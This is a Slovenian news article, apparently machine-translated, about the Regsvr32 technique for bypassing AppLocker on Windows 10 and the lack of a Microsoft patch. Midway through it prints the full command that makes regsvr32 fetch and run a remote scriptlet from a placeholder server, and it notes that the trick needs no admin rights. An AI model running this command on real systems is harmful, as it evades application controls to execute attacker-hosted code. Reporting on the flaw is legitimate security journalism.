Raziskovalec iz Kolorada, ki se imenuje Casey Smith, je ugotovil, da je Regsvr32 mogoče uporabiti za obhod AppLockerja v sistemu Windows 10 in to je velika težava za uporabnike računalnikov, zlasti tiste v poslovnem okolju.

AppLocker je bil prvič predstavljen v sistemih Windows 7 in Windows Server 2008 R2. Zasnovan je tako, da lahko skrbniki določijo, katera skupina ali uporabniki lahko izkoristijo nekatere ali vse aplikacije na podlagi edinstvene identitete datotek. Če ste oseba, ki ponavadi uporablja AppLocker, potem mora biti splošno znano, da se lahko uporablja za ustvarjanje določenih pravil, ki omogočajo aplikacijam, da jih zaženejo ali ustavijo v svojih skladbah.

Za tiste, ki se morda ne zavedajo, se Regvr32 lahko uporablja za registracijo in odjavljanje DLL-jev. To ni orodje z enim klikom, saj gre za pripomoček ukazne vrstice, zato bi morali le napredni računalniški uporabniki iskati prednosti tega, kar lahko ponudi.

Zavedamo se, da z uporabo te tehnike ne spremeni registra računalniškega sistema, zaradi česar bodo skrbniki težko vedeli, ali so bile izvedene kakršne koli spremembe.

regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll

"Neverjetno pri tem je, da se regsvr32 že zaveda, da uporablja proxy, uporablja TLS, sledi preusmeritve itd … In … Uganili ste podpisano, privzeto MS binarno datoteko. Torej, vse, kar morate storiti, je gostovati datoteko your.sct na lokaciji, ki jo nadzorujete, "je zapisal Smith.

Zgornja tehnika ne zahteva upravnih pravic in ne spreminja registra. Poleg tega je mogoče skripte poklicati prek HTTP ali HTTPS. Trenutno Microsoft še ni izdal popravka za to majhno težavo, zato je edina možnost na tem mestu blokiranje Regsvr32 prek požarnega zidu Windows.

Zanimivo je, da se programski gigant še ni odzval na to varnostno težavo, s katero se sooča svoj operacijski sistem. Zdaj, ko je zunaj na prostem, pričakujemo, da bomo od podjetja slišali nekaj skupaj s pogovori o prihodnjem popravku.